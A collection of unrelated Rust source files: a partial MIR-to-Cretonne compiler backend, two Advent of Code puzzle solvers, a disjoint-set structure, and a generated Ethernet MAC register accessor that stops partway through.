fn get_local_index(&self, i: usize) -> Option<usize> {
debug!("fetching local {:?}", i);
debug!(" vars: {:?}", self.var_map);
debug!(" temps: {:?}", self.temp_map);
if i == 0 {
debug!("returning retvar");
return self.ret_var;
}
let i = i - 1;
if i < self.num_args() {
debug!("returning function arg {}", i);
return Some(i);
}
let i = i - self.num_args();
if i < self.var_map.len() {
debug!("returning {}th local: {:?}", i, self.var_map[i]);
return self.var_map[i];
}
let i = i - self.var_map.len();
assert!(i < self.temp_map.len());
debug!("returning {}th temp: {:?}", i, self.temp_map[i]);
self.temp_map[i]
}
}
impl<'f: 'g, 'g, 'd, 'tcx: 'd> CretonneFnCtxt<'f, 'g, 'd, 'tcx, 'tcx> {
/// This is the main entry point for MIR->cretonne fn translation
fn trans(&mut self) {
let mir = self.mir;
// Maintain a cache of translated monomorphizations and bail
// if we've already seen this one.
use std::collections::hash_map::Entry::*;
match self.fun_names.entry((self.did, *self.sig)) {
Occupied(_) => return,
Vacant(entry) => {
let fn_name = sanitize_symbol(&self.tcx.item_path_str(self.did));
entry.insert(fn_name);
}
}
debug!("translating fn {:?}", self.tcx.item_path_str(self.did));
// Translate arg and ret tys to cretonne
for ty in self.sig.inputs() {
if let Some(cton_ty) = rust_ty_to_cretonne(ty) {
panic!("Unimplemented: function arguments");
}
}
let mut needs_ret_var = false;
let ret_ty = self.sig.output();
debug!("ret_ty is {:?}", ret_ty);
let cretonne_ret = rust_ty_to_cretonne(ret_ty);
needs_ret_var = cretonne_ret.is_some();
debug!("needs_ret_var = {:?}", needs_ret_var);
// Create the wasm vars.
// Params and vars form the list of locals, both sharing the same index space.
// TODO: Use mir.local_decls directly rather than the two iterators.
for mir_var in mir.vars_iter() {
debug!(
"adding local {:?}: {:?}",
mir_var,
mir.local_decls[mir_var].ty
);
match rust_ty_to_cretonne(mir.local_decls[mir_var].ty) {
Some(cton_ty) => {
panic!("Unimplemented: local variables");
}
None => self.var_map.push(None),
}
}
for mir_var in mir.temps_iter() {
debug!("adding temp {:?}", mir_var);
panic!("Unimplemented: temporary variables");
}
if needs_ret_var {
debug!("adding ret var");
panic!("Unimplemented: return variables");
}
debug!("{} MIR basic blocks to translate", mir.basic_blocks().len());
for (i, bb) in mir.basic_blocks().iter().enumerate() {
debug!("bb{}: {:#?}", i, bb);
let mut cretonne_stmts = Vec::new();
for stmt in &bb.statements {
match stmt.kind {
StatementKind::Assign(ref lvalue, ref rvalue) => {
self.trans_assignment(lvalue, rvalue, &mut cretonne_stmts);
}
StatementKind::StorageLive(_) => {}
StatementKind::StorageDead(_) => {}
_ => panic!("{:?}", stmt.kind),
}
}
let block_kind = CretonneBlockKind::Default;
match bb.terminator().kind {
TerminatorKind::Return => {
// TODO: Emit function epilogue, if necessary.
debug!(
"emitting Return from fn {:?}",
self.tcx.item_path_str(self.did)
);
if ret_ty.is_nil() {
self.builder.ins().return_(&[]);
} else {
// Local 0 is guaranteed to be return pointer
let v = self.trans_operand(&Operand::Consume(Lvalue::Local(Local::new(0))));
self.builder.ins().return_(&[v]);
}
}
TerminatorKind::Call {
ref func,
ref args,
ref destination,
..
} => {
panic!("Unimplemented: terminator calls");
}
TerminatorKind::Goto { ref target } => {
debug!(
"emitting Branch for Goto, from bb{} to bb{}",
i,
target.index()
);
panic!("Unimplemented: Goto");
}
TerminatorKind::Assert { ref target, .. } => {
// TODO: An assert is not a GOTO!!!
// Fix this!
debug!(
"emitting Branch for Goto, from bb{} to bb{}",
i,
target.index()
);
panic!("Unimplemented: Assert");
}
_ => (),
}
}
if !self.fun_types.contains_key(self.sig) {
let name = format!("rustfn-{}-{}", self.did.krate, self.did.index.as_u32());
panic!("Unimplemented: declare function type");
/*self.fun_types.insert(*self.sig, ty);*/
}
let nid = self.tcx.hir.as_local_node_id(self.did).expect("");
if Some(self.did) == self.tcx.lang_items.panic_fn() {
// TODO: when it's possible to print characters or interact with the environment,
// also handle #[lang = "panic_fmt"] to support panic messages
debug!("emitting Unreachable function for panic lang item");
panic!("Unimplemented: panic lang item");
} else {
// Create the function prologue
// TODO: the epilogue and prologue are not always necessary
debug!("emitting function prologue");
panic!("Unimplemented: function prologue");
}
debug!(
"done translating fn {:?}\n",
self.tcx.item_path_str(self.did)
);
}
fn trans_assignment(
&mut self,
lvalue: &Lvalue<'tcx>,
rvalue: &Rvalue<'tcx>,
statements: &mut Vec<cretonne::ir::Value>,
) {
let mir = self.mir;
let dest = match self.trans_lval(lvalue) {
Some(dest) => dest,
None => {
// TODO: the rvalue may have some effects that we need to preserve. For example,
// reading from memory can cause a fault.
debug!(
"trans_assignment lval is unit: {:?} = {:?}; skipping",
lvalue,
rvalue
);
return;
}
};
let dest_ty = lvalue.ty(&*mir, self.tcx).to_ty(self.tcx);
let dest_layout = self.type_layout(dest_ty);
match *rvalue {
Rvalue::Use(ref operand) => {
let src = self.trans_operand(operand);
let statement = match dest.offset {
Some(offset) => {
debug!(
"emitting Store + GetLocal({}) for Assign Use '{:?} = {:?}'",
dest.index,
lvalue,
rvalue
);
let ptr = self.builder.use_var(Variable(dest.index));
// TODO: match on the dest_ty to know how many bytes to write, not just
// i32s
panic!("Unimplemented: rvalues");
/*
CretonneStore(self.func.module.module,
4,
offset,
0,
ptr,
src,
CretonneInt32())
*/
}
None => {
debug!(
"emitting SetLocal({}) for Assign Use '{:?} = {:?}'",
dest.index,
lvalue,
rvalue
);
panic!("Unimplemented: set_local for assign use");
/*
CretonneSetLocal(self.func.module.module, dest.index, src)
*/
}
};
statements.push(statement);
}
Rvalue::UnaryOp(ref op, ref operand) => {
let mut operand = self.trans_operand(operand);
operand = match *op {
UnOp::Not => self.builder.ins().icmp_imm(IntCC::Equal, operand, 0),
_ => panic!("unimplemented UnOp: {:?}", op),
};
self.builder.def_var(Variable(dest.index), operand);
}
Rvalue::BinaryOp(ref op, ref left, ref right) => {
let left = self.trans_operand(left);
let right = self.trans_operand(right);
// TODO: match on dest_ty.sty to implement binary ops for other types than just
// integers
// TODO: check if the dest_layout is signed or not (CEnum, etc)
// TODO: comparisons are signed only for now, so implement unsigned ones
let op = match *op {
BinOp::Add => self.builder.ins().iadd(left, right),
BinOp::Sub => self.builder.ins().isub(left, right),
BinOp::Mul => self.builder.ins().imul(left, right),
BinOp::Div => self.builder.ins().sdiv(left, right),
BinOp::BitAnd => self.builder.ins().band(left, right),
BinOp::BitOr => self.builder.ins().bor(left, right),
BinOp::BitXor => self.builder.ins().bxor(left, right),
BinOp::Eq => self.builder.ins().icmp(IntCC::Equal, left, right),
BinOp::Ne => self.builder.ins().icmp(IntCC::NotEqual, left, right),
BinOp::Lt => self.builder.ins().icmp(IntCC::SignedLessThan, left, right),
BinOp::Le => {
self.builder.ins().icmp(
IntCC::SignedLessThanOrEqual,
left,
right,
)
}
BinOp::Gt => {
self.builder.ins().icmp(
IntCC::SignedGreaterThan,
left,
right,
)
}
BinOp::Ge => {
self.builder.ins().icmp(
IntCC::SignedGreaterThanOrEqual,
left,
right,
)
}
_ => panic!("unimplemented BinOp: {:?}", op),
};
match dest.offset {
Some(offset) => {
debug!(
"emitting Store + GetLocal({}) for Assign BinaryOp '{:?} = \
{:?}'",
dest.index,
lvalue,
rvalue
);
let ptr = self.builder.use_var(Variable(dest.index));
// TODO: Set the trap/align flags.
let memflags = cretonne::ir::MemFlags::new();
let memoffset = cretonne::ir::immediates::Offset32::new(offset as i32);
// TODO: match on the dest_ty to know how many bytes to write, not just
// i32s
self.builder.ins().store(memflags, op, ptr, memoffset);
}
None => {
debug!(
"emitting SetLocal({}) for Assign BinaryOp '{:?} = {:?}'",
dest.index,
lvalue,
rvalue
);
self.builder.def_var(Variable(dest.index), op);
}
}
}
Rvalue::CheckedBinaryOp(ref op, ref left, ref right) => {
panic!("Unimplemented: Checked binary op");
}
Rvalue::Ref(_, _, ref lvalue) => {
// TODO: for shared refs only ?
// TODO: works for refs to "our stack", but not the locals on the wasm stack yet
let expr = self.trans_operand(&Operand::Consume(lvalue.clone()));
debug!(
"emitting SetLocal({}) for Assign Ref '{:?} = {:?}'",
dest.index,
lvalue,
rvalue
);
self.builder.def_var(Variable(dest.index), expr);
}
Rvalue::Aggregate(ref kind, ref operands) => {
panic!("Unimplemented Rvalue::Aggregate");
}
Rvalue::Cast(ref kind, ref operand, _) => {
if dest.offset.is_some() {
panic!("unimplemented '{:?}' Cast with offset", kind);
}
match *kind {
CastKind::Misc => {
let src = self.trans_operand(operand);
let src_ty = operand.ty(&*mir, self.tcx);
let src_layout = self.type_layout(src_ty);
// TODO: handle more of the casts (miri doesn't really handle every Misc
// cast either right now)
match (src_layout, &dest_ty.sty) {
(&Layout::Scalar { .. }, &ty::TyInt(_)) |
(&Layout::Scalar { .. }, &ty::TyUint(_)) => {
debug!(
"emitting SetLocal({}) for Scalar Cast Assign '{:?} = \
{:?}'",
dest.index,
lvalue,
rvalue
);
self.builder.def_var(Variable(dest.index), src);
}
(&Layout::CEnum { .. }, &ty::TyInt(_)) |
(&Layout::CEnum { .. }, &ty::TyUint(_)) => {
debug!(
"emitting SetLocal({}) for CEnum Cast Assign '{:?} = {:?}'",
dest.index,
lvalue,
rvalue
);
self.builder.def_var(Variable(dest.index), src);
}
_ => {
panic!(
"unimplemented '{:?}' Cast '{:?} = {:?}', for {:?} to {:?}",
kind,
lvalue,
rvalue,
src_layout,
dest_ty.sty
)
}
}
}
_ => {
panic!(
"unimplemented '{:?}' Cast '{:?} = {:?}'",
kind,
lvalue,
rvalue
)
}
}
}
_ => panic!("unimplemented Assign '{:?} = {:?}'", lvalue, rvalue),
}
}
// TODO this function changed from being passed offsets-after-field to offsets-of-field...
// but I suspect it still does the right thing - emit a store for every field.
// Did it miss the first field and emit after the last field of the struct before?
fn emit_assign_fields<I>(
&mut self,
offsets: I,
operands: &[Operand<'tcx>],
statements: &mut Vec<cretonne::ir::Value>,
) where
I: IntoIterator<Item = u64>,
{
panic!("Unimplemented: assign_fields");
/*
for (offset, operand) in offsets.into_iter().zip(operands) {
// let operand_ty = mir.operand_ty(*self.tcx, operand);
// TODO: match on the operand_ty to know how many bytes to store, not just i32s
let src = self.trans_operand(operand);
let write_field = CretonneStore(self.func.module.module,
4,
offset as u32,
0,
read_sp,
src,
CretonneInt32());
statements.push(write_field);
}
*/
}
fn trans_lval(&mut self, lvalue: &Lvalue<'tcx>) -> Option<CretonneLvalue> {
let mir = self.mir;
debug!("translating lval: {:?}", lvalue);
let i = match *lvalue {
Lvalue::Local(i) => {
match self.get_local_index(i.index()) {
Some(i) => i as u32,
None => return None,
}
}
Lvalue::Projection(ref projection) => {
let base = match self.trans_lval(&projection.base) {
Some(base) => base,
None => return None,
};
let base_ty = projection.base.ty(&*mir, self.tcx).to_ty(self.tcx);
let base_layout = self.type_layout(base_ty);
match projection.elem {
ProjectionElem::Deref => {
if base.offset.is_none() {
return Some(CretonneLvalue::new(base.index, None, LvalueExtra::None));
}
panic!("unimplemented Deref {:?}", lvalue);
}
ProjectionElem::Field(ref field, _) => {
let variant = match *base_layout {
Layout::Univariant { ref variant, .. } => variant,
Layout::General { ref variants, .. } => {
if let LvalueExtra::DowncastVariant(variant_idx) = base.extra {
&variants[variant_idx]
} else {
panic!("field access on enum had no variant index");
}
}
_ => panic!("unimplemented Field Projection: {:?}", projection),
};
let offset = variant.offsets[field.index()].bytes() as u32;
return Some(
CretonneLvalue::new(base.index, base.offset, LvalueExtra::None)
.offset(offset),
);
}
ProjectionElem::Downcast(_, variant) => {
match *base_layout {
Layout::General { discr, .. } => {
assert!(
base.offset.is_none(),
"unimplemented Downcast Projection with offset"
);
let offset = discr.size().bytes() as u32;
return Some(CretonneLvalue::new(
base.index,
Some(offset),
LvalueExtra::DowncastVariant(variant),
));
}
_ => panic!("unimplemented Downcast Projection: {:?}", projection),
}
}
_ => panic!("unimplemented Projection: {:?}", projection),
}
}
_ => panic!("unimplemented Lvalue: {:?}", lvalue),
};
Some(CretonneLvalue::new(
i as CretonneIndex,
None,
LvalueExtra::None,
))
}
fn trans_operand(&mut self, operand: &Operand<'tcx>) -> cretonne::ir::Value {
let mir = self.mir;
match *operand {
Operand::Consume(ref lvalue) => {
let cretonne_lvalue = match self.trans_lval(lvalue) {
Some(lval) => lval,
None => {
debug!("operand lval is unit: {:?}", operand);
panic!("Unimplemented: unit lvalues");
}
};
let lval_ty = lvalue.ty(&*mir, self.tcx);
let t = lval_ty.to_ty(self.tcx);
let t = rust_ty_to_cretonne(t);
match cretonne_lvalue.offset {
Some(offset) => {
debug!(
"emitting GetLocal({}) + Load for '{:?}'",
cretonne_lvalue.index,
lvalue
);
let ptr = self.builder.use_var(Variable(cretonne_lvalue.index));
// TODO: match on the field ty to know how many bytes to read, not just
// i32s
// TODO: Set the trap/align flags.
let memflags = cretonne::ir::MemFlags::new();
let memoffset = cretonne::ir::immediates::Offset32::new(offset as i32);
self.builder.ins().load(
cretonne::ir::types::I32,
memflags,
ptr,
memoffset,
)
}
None => {
// debug!("emitting GetLocal for '{:?}'", lvalue);
self.builder.use_var(Variable(cretonne_lvalue.index))
}
}
}
Operand::Constant(ref c) => {
match c.literal {
Literal::Value { ref value } => {
// TODO: handle more Rust types here
match *value {
ConstVal::Integral(ConstInt::Isize(ConstIsize::Is32(val))) |
ConstVal::Integral(ConstInt::I32(val)) => {
self.builder.ins().iconst(
cretonne::ir::types::I32,
val as i64,
)
}
// TODO: Since we're at the wasm32 stage, and until wasm64, it's
// probably best if isize is always i32 ?
ConstVal::Integral(ConstInt::Isize(ConstIsize::Is64(val))) => {
self.builder.ins().iconst(cretonne::ir::types::I64, val)
}
ConstVal::Integral(ConstInt::I64(val)) => {
self.builder.ins().iconst(cretonne::ir::types::I64, val)
}
ConstVal::Bool(val) => {
self.builder.ins().bconst(cretonne::ir::types::B1, val)
}
_ => panic!("unimplemented value: {:?}", value),
}
}
Literal::Promoted { .. } => panic!("unimplemented Promoted Literal: {:?}", c),
_ => panic!("unimplemented Constant Literal {:?}", c),
}
}
}
}
// Imported from miri and slightly modified to adapt to our monomorphize api
fn type_layout_with_substs(&self, ty: Ty<'tcx>, substs: &Substs<'tcx>) -> &'tcx Layout {
// TODO: Is this inefficient? Needs investigation.
let ty = monomorphize::apply_substs(self.tcx, substs, &ty);
self.tcx.infer_ctxt().enter(|infcx| {
// TODO: Report this error properly.
let param_env = ty::ParamEnv::empty(Reveal::All);
ty.layout(self.tcx, param_env).unwrap()
})
}
#[inline]
fn type_size(&self, ty: Ty<'tcx>) -> usize {
let substs = Substs::empty();
self.type_size_with_substs(ty, substs)
}
// Imported from miri
#[inline]
fn type_size_with_substs(&self, ty: Ty<'tcx>, substs: &'tcx Substs<'tcx>) -> usize {
self.type_layout_with_substs(ty, substs)
.size(&self.tcx.data_layout)
.bytes() as usize
}
#[inline]
fn type_layout(&self, ty: Ty<'tcx>) -> &'tcx Layout {
let substs = Substs::empty();
self.type_layout_with_substs(ty, substs)
}
}
fn rust_ty_to_cretonne(t: Ty) -> Option<cretonne::ir::Type> {
// FIXME zero-sized-types
if t.is_nil() || t.is_never() {
return None;
}
match t.sty {
ty::TyFloat(FloatTy::F32) => Some(cretonne::ir::types::F32),
ty::TyFloat(FloatTy::F64) => Some(cretonne::ir::types::F64),
ty::TyInt(IntTy::I32) |
ty::TyUint(UintTy::U32) => Some(cretonne::ir::types::I32),
ty::TyInt(IntTy::I64) |
ty::TyUint(UintTy::U64) => Some(cretonne::ir::types::I64),
_ => panic!("unsupported type {}", t.sty),
}
}
fn sanitize_symbol(s: &str) -> String {
s.chars()
.map(|c| match c {
'<' | '>' | ' ' | '(' | ')' => '_',
_ => c,
})
.collect()
}
#[derive(Debug)]
enum CretonneCallKind {
Direct,
Import, // Indirect // unimplemented at the moment
}
enum CretonneBlockKind {
Default,
Switch(cretonne::ir::Value),
}
type CretonneIndex = u32;
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
struct CretonneLvalue {
index: CretonneIndex,
offset: Option<u32>,
extra: LvalueExtra,
}
impl CretonneLvalue {
fn new(index: CretonneIndex, offset: Option<u32>, extra: LvalueExtra) -> Self {
CretonneLvalue {
index: index,
offset: offset,
extra: extra,
}
}
fn offset(&self, offset: u32) -> Self {
let offset = match self.offset {
None => Some(offset),
Some(base_offset) => Some(base_offset + offset),
};
Self::new(self.index, offset, self.extra)
}
}
// The following is imported from miri as well
#[derive(Copy, Clone, Debug, Eq, PartialEq)]
enum LvalueExtra {
None,
// Length(u64),
// TODO: Vtable(memory::AllocId),
DowncastVariant(usize),
}
trait IntegerExt {
fn size(self) -> Size;
}
impl IntegerExt for layout::Integer {
fn size(self) -> Size {
use rustc::ty::layout::Integer::*;
match self {
I1 | I8 => Size::from_bits(8),
I16 => Size::from_bits(16),
I32 => Size::from_bits(32),
I64 => Size::from_bits(64),
I128 => panic!("i128 is not yet supported"),
}
}
}
|
use std::mem;
use std::env;
use super::file_loader;
pub fn run(part: i32) {
let input = file_loader::load_file("2.input");
println!("File content: {:?}", input);
let intcode: Vec<u32> = input.split(",")
.map(|number| number.parse::<u32>().unwrap())
.collect();
if part == 1 {
let args: Vec<String> = env::args().collect();
let noun = args[3].parse::<u32>().expect("Should provide noun");
let verb = args[4].parse::<u32>().expect("Should provide verb");
let result = process_for_result(intcode.to_vec(), noun, verb);
println!();
println!("Answer is {}", result);
} else {
'outer: for i in 30..60 {
'inner: for j in 30..50 {
let result = process_for_result(intcode.to_vec(), i, j);
println!("Result for n {} and v {} is {}", i, j, result);
if result == 19690720 {
println!();
println!("Answer is {}", 100 * i + j);
break 'outer;
}
}
}
}
}
fn process_for_result(mut intcode: Vec<u32>, noun: u32, verb: u32) -> u32 {
//println!("Processing: {:?}", intcode);
intcode[1] = noun;
intcode[2] = verb;
let mut ptr: usize = 0;
loop {
//println!("Pointer is: {}, Value is: {}", ptr, intcode[ptr]);
//println!("Before: {:?}", intcode);
process_next_number(&mut intcode, &mut ptr);
if intcode[ptr] == 99 {
break;
}
}
//println!("Final: {:?}", intcode);
return intcode[0];
}
fn process_next_number(run: &mut Vec<u32>, ptr: &mut usize) {
let opcode = run[*ptr];
match opcode {
1 => add(run, ptr),
2 => multiply(run, ptr),
_ => panic!("Unknown opcode {}. Something went wrong", opcode)
}
}
fn add(run: &mut Vec<u32>, ptr: &mut usize) {
let one: usize = run[*ptr + 1] as usize;
let two: usize = run[*ptr + 2] as usize;
let answer: usize = run[*ptr + 3] as usize;
let result = run[one] + run[two];
//println!("Adding {} and {} to get {} to put at index {}", run[one], run[two], result, answer);
//run.insert(answer, result);
mem::replace(&mut run[answer], result);
//let mut newValue: usize = *ptr + 4;
*ptr = *ptr + 4;
}
fn multiply(run: &mut Vec<u32>, ptr: &mut usize) {
let one: usize = run[*ptr + 1] as usize;
let two: usize = run[*ptr + 2] as usize;
let answer: usize = run[*ptr + 3] as usize;
let result = run[one] * run[two];
//println!("Adding {} and {} to get {} to put at index {}", run[one], run[two], result, answer);
//run.insert(answer, result);
mem::replace(&mut run[answer], result);
//let mut newValue: usize = *ptr + 4;
*ptr = *ptr + 4;
} |
use lazy_static::lazy_static;
use regex::Regex;
use std::collections::HashMap;
use util::*;
lazy_static! {
static ref RE: Regex = Regex::new(
r"(?P<color>[a-z]+ [a-z]+) bags contain (?P<children>([0-9]+ [a-z]+ [a-z]+ bags?(, )?)*)."
)
.unwrap();
static ref RE_CHILDREN: Regex =
Regex::new(r"(?P<count>[0-9]+) (?P<color>[a-z]+ [a-z]+) bags?").unwrap();
}
fn main() -> Result<(), Box<dyn std::error::Error>> {
let timer = Timer::new();
let input = input::lines::<String>(&std::env::args().nth(1).unwrap());
let bags: HashMap<String, Vec<(u32, String)>> = input.iter().map(parse).collect();
let mut count = 0;
for (color, _) in &bags {
if color != "shiny gold" && contains_golden(&color, &bags) {
count += 1;
}
}
timer.print();
println!("{}", count);
Ok(())
}
fn parse(line: &String) -> (String, Vec<(u32, String)>) {
let cap = RE.captures(line).unwrap();
let mut contains = Vec::new();
let color = cap["color"].to_owned();
if let Some(children) = cap.name("children") {
for c in children.as_str().split_terminator(", ") {
let cap = RE_CHILDREN.captures(c).unwrap();
contains.push((cap["count"].parse().unwrap(), cap["color"].to_owned()));
}
}
(color, contains)
}
fn contains_golden(color: &String, bags: &HashMap<String, Vec<(u32, String)>>) -> bool {
if color == "shiny gold" {
return true;
}
let children = bags.get(color).unwrap();
for (_, color) in children.iter() {
if contains_golden(color, bags) {
return true;
}
}
false
}
|
// use std::vec::Vec;
use std::collections::hash_map::HashMap;
use std::hash::Hash;
// use std::ops::Deref;
// use std::ops::Index;
// use core::iter::FromIterator;
pub struct DisjSets<T> {
parent: Vec<usize>,
size: Vec<i32>,
idx: HashMap<T,usize> }
fn root_inner(parent : &mut Vec<usize>, x: usize) -> usize {
let mut i = x;
while i != parent[i] {
let prev = i;
i = parent[i];
parent[prev] = parent[i] }
i }
impl <T> DisjSets<T>
where T : Hash, T: Eq, T : Clone, T : core::fmt::Debug {
pub fn new() -> DisjSets<T> {
DisjSets { parent: Vec::new(),
size: Vec::new(),
// vals: Vec::new(),
idx: HashMap::new() } }
fn get_index (&mut self, x: &T) -> usize {
if let Some(i) = self.idx.get(x) {
*i
} else {
let i = self.parent.len();
self.parent.push(i);
self.size.push(1);
// self.vals.push((*x).clone());
self.idx.insert((*x).clone(), i);
i } }
fn root(&mut self, x: &T) -> usize {
let i = self.get_index(x);
root_inner(&mut self.parent, i) }
pub fn merge(&mut self, x: &T, y: &T) {
let mut i = self.root(x);
let mut j = self.root(y);
if i == j { return }
if self.size[i] < self.size[j] {
std::mem::swap(&mut i, &mut j)
}
self.parent[j] = i;
self.size[i] = self.size[i] + self.size[j];
let i2 = self.get_index(x);
let j2 = self.get_index(y);
assert!(self.same_set(x,y), format!("{:?} ({}, {}), {:?} ({}, {}), - {:?}", x, i, i2, y, j, j2, self.parent)) }
pub fn same_set(&mut self, x : &T, y : &T) -> bool {
let i = self.root(x);
let j = self.root(y);
i == j }
pub fn list_sets(&mut self) -> Vec<Vec<T>> {
let mut h : HashMap<usize, Vec<T>> = HashMap::new();
for (x,i) in &self.idx {
let j = root_inner(&mut self.parent, *i);
if let Some(v) = h.get_mut(&j) { v.push(x.clone()) }
else {
let mut v = Vec::new();
v.push(x.clone());
h.insert(j,v); } }
h.drain().map(|x| x.1).collect() }
}
|
#[doc = "Register `MACCR` reader"]
pub type R = crate::R<MACCR_SPEC>;
#[doc = "Register `MACCR` writer"]
pub type W = crate::W<MACCR_SPEC>;
#[doc = "Field `RE` reader - Receiver Enable"]
pub type RE_R = crate::BitReader;
#[doc = "Field `RE` writer - Receiver Enable"]
pub type RE_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `TE` reader - Transmitter Enable"]
pub type TE_R = crate::BitReader;
#[doc = "Field `TE` writer - Transmitter Enable"]
pub type TE_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `PRELEN` reader - Preamble Length for Transmit Packets"]
pub type PRELEN_R = crate::FieldReader;
#[doc = "Field `PRELEN` writer - Preamble Length for Transmit Packets"]
pub type PRELEN_W<'a, REG, const O: u8> = crate::FieldWriter<'a, REG, 2, O>;
#[doc = "Field `DC` reader - Deferral Check"]
pub type DC_R = crate::BitReader;
#[doc = "Field `DC` writer - Deferral Check"]
pub type DC_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `BL` reader - Back-Off Limit"]
pub type BL_R = crate::FieldReader;
#[doc = "Field `BL` writer - Back-Off Limit"]
pub type BL_W<'a, REG, const O: u8> = crate::FieldWriter<'a, REG, 2, O>;
#[doc = "Field `DR` reader - Disable Retry"]
pub type DR_R = crate::BitReader;
#[doc = "Field `DR` writer - Disable Retry"]
pub type DR_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `DCRS` reader - Disable Carrier Sense During Transmission"]
pub type DCRS_R = crate::BitReader;
#[doc = "Field `DCRS` writer - Disable Carrier Sense During Transmission"]
pub type DCRS_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `DO` reader - Disable Receive Own"]
pub type DO_R = crate::BitReader;
#[doc = "Field `DO` writer - Disable Receive Own"]
pub type DO_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `ECRSFD` reader - Enable Carrier Sense Before Transmission in Full-Duplex Mode"]
pub type ECRSFD_R = crate::BitReader;
#[doc = "Field `ECRSFD` writer - Enable Carrier Sense Before Transmission in Full-Duplex Mode"]
pub type ECRSFD_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `LM` reader - Loopback Mode"]
pub type LM_R = crate::BitReader;
#[doc = "Field `LM` writer - Loopback Mode"]
pub type LM_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `DM` reader - Duplex Mode"]
pub type DM_R = crate::BitReader;
#[doc = "Field `DM` writer - Duplex Mode"]
pub type DM_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `FES` reader - MAC Speed"]
pub type FES_R = crate::BitReader;
#[doc = "Field `FES` writer - MAC Speed"]
pub type FES_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `JE` reader - Jumbo Packet Enable"]
pub type JE_R = crate::BitReader;
#[doc = "Field `JE` writer - Jumbo Packet Enable"]
pub type JE_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `JD` reader - Jabber Disable"]
pub type JD_R = crate::BitReader;
#[doc = "Field `JD` writer - Jabber Disable"]
pub type JD_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `WD` reader - Watchdog Disable"]
pub type WD_R = crate::BitReader;
#[doc = "Field `WD` writer - Watchdog Disable"]
pub type WD_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `ACS` reader - Automatic Pad or CRC Stripping"]
pub type ACS_R = crate::BitReader;
#[doc = "Field `ACS` writer - Automatic Pad or CRC Stripping"]
pub type ACS_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `CST` reader - CRC stripping for Type packets"]
pub type CST_R = crate::BitReader;
#[doc = "Field `CST` writer - CRC stripping for Type packets"]
pub type CST_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `S2KP` reader - IEEE 802.3as Support for 2K Packets"]
pub type S2KP_R = crate::BitReader;
#[doc = "Field `S2KP` writer - IEEE 802.3as Support for 2K Packets"]
pub type S2KP_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `GPSLCE` reader - Giant Packet Size Limit Control Enable"]
pub type GPSLCE_R = crate::BitReader;
#[doc = "Field `GPSLCE` writer - Giant Packet Size Limit Control Enable"]
pub type GPSLCE_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `IPG` reader - Inter-Packet Gap"]
pub type IPG_R = crate::FieldReader;
#[doc = "Field `IPG` writer - Inter-Packet Gap"]
pub type IPG_W<'a, REG, const O: u8> = crate::FieldWriter<'a, REG, 3, O>;
#[doc = "Field `IPC` reader - Checksum Offload"]
pub type IPC_R = crate::BitReader;
#[doc = "Field `IPC` writer - Checksum Offload"]
pub type IPC_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
#[doc = "Field `SARC` reader - Source Address Insertion or Replacement Control"]
pub type SARC_R = crate::FieldReader;
#[doc = "Field `SARC` writer - Source Address Insertion or Replacement Control"]
pub type SARC_W<'a, REG, const O: u8> = crate::FieldWriter<'a, REG, 3, O>;
#[doc = "Field `ARPEN` reader - ARP Offload Enable"]
pub type ARPEN_R = crate::BitReader;
#[doc = "Field `ARPEN` writer - ARP Offload Enable"]
pub type ARPEN_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O>;
impl R {
#[doc = "Bit 0 - Receiver Enable"]
#[inline(always)]
pub fn re(&self) -> RE_R {
RE_R::new((self.bits & 1) != 0)
}
#[doc = "Bit 1 - Transmitter Enable"]
#[inline(always)]
pub fn te(&self) -> TE_R {
TE_R::new(((self.bits >> 1) & 1) != 0)
}
#[doc = "Bits 2:3 - Preamble Length for Transmit Packets"]
#[inline(always)]
pub fn prelen(&self) -> PRELEN_R {
PRELEN_R::new(((self.bits >> 2) & 3) as u8)
}
#[doc = "Bit 4 - Deferral Check"]
#[inline(always)]
pub fn dc(&self) -> DC_R {
DC_R::new(((self.bits >> 4) & 1) != 0)
}
#[doc = "Bits 5:6 - Back-Off Limit"]
#[inline(always)]
pub fn bl(&self) -> BL_R {
BL_R::new(((self.bits >> 5) & 3) as u8)
}
#[doc = "Bit 8 - Disable Retry"]
#[inline(always)]
pub fn dr(&self) -> DR_R {
DR_R::new(((self.bits >> 8) & 1) != 0)
}
#[doc = "Bit 9 - Disable Carrier Sense During Transmission"]
#[inline(always)]
pub fn dcrs(&self) -> DCRS_R {
DCRS_R::new(((self.bits >> 9) & 1) != 0)
}
#[doc = "Bit 10 - Disable Receive Own"]
#[inline(always)]
pub fn do_(&self) -> DO_R {
DO_R::new(((self.bits >> 10) & 1) != 0)
}
#[doc = "Bit 11 - Enable Carrier Sense Before Transmission in Full-Duplex Mode"]
#[inline(always)]
pub fn ecrsfd(&self) -> ECRSFD_R {
ECRSFD_R::new(((self.bits >> 11) & 1) != 0)
}
#[doc = "Bit 12 - Loopback Mode"]
#[inline(always)]
pub fn lm(&self) -> LM_R {
LM_R::new(((self.bits >> 12) & 1) != 0)
}
#[doc = "Bit 13 - Duplex Mode"]
#[inline(always)]
pub fn dm(&self) -> DM_R {
DM_R::new(((self.bits >> 13) & 1) != 0)
}
